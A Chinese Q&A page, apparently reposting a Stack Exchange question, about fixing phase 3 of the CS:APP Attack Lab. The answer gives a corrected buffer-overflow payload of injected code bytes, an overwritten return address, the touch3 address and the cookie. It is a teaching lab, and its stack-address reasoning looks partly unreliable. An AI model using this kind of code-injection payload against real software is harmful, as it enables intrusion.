You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

CSAPP Attack Lab第三阶段执行异常求助:两种方案均失败

CS:APP Attack Lab 第三阶段问题分析与解决建议

第一种方案段错误原因

你构造的gadget里,movq $0x5561f8d0, %rdi指定的地址并非cookie实际存放的栈地址,导致touch3尝试读取该地址时触发段错误。

验证器判定有效是因为它只检查逻辑流程(是否正确设置%rdi并调用touch3),但不会验证你传入的地址是否可访问或指向正确数据。

正确的地址计算方法

已知Phase2中%rsp为0x5561f8c0,结合getbuff的0x28字节缓冲区,栈布局如下:

  • 缓冲区起始地址:0x5561f8c0 - 0x10(call指令压栈+push rbp) - 0x28(缓冲区大小) = 0x5561f888
  • cookie的存放位置:缓冲区(0x28) + 返回地址(8字节) + touch3地址(8字节) = 0x5561f888 + 0x28 + 0x8 + 0x8 = 0x5561f8c0

你需要把gadget中的立即数改为0x5561f8c0,而非原来的0x5561f8d0。

第二种方案读取乱码原因

你在gadget中执行push touch3地址后,栈的实际布局发生偏移,导致%rdi指向的0x5561f8d0完全偏离cookie的实际位置,同时栈指针的变化进一步打乱了地址对应关系,最终读取到乱码。

修正后的第一种方案payload

48 c7 c7 c0 f8 61 55 c3  /* movq $0x5561f8c0, %rdi; ret */
00 00 00 00 00 00 00 00  /* 填充至0x28 */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

88 f8 61 55 00 00 00 00   /* 指向缓冲区起始的gadget地址 */

fe 18 40 00 00 00 00 00  /* touch3的地址 */
32 33 32 61 64 64 31 62  /* 十六进制cookie */

注意:返回地址要改为gadget实际所在的缓冲区起始地址0x5561f888(即payload前8字节的地址),而非原来的0x5561f898。

额外提示

  • 可以用gdb断点调试,查看getbuff返回时的栈布局,确认cookie的实际地址
  • 检查touch3逻辑:它需要%rdi指向以null结尾的字符串,若仍有问题,可在cookie后补充00字节

内容的提问来源于stack exchange,提问作者Someone

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.08.15 01:05:22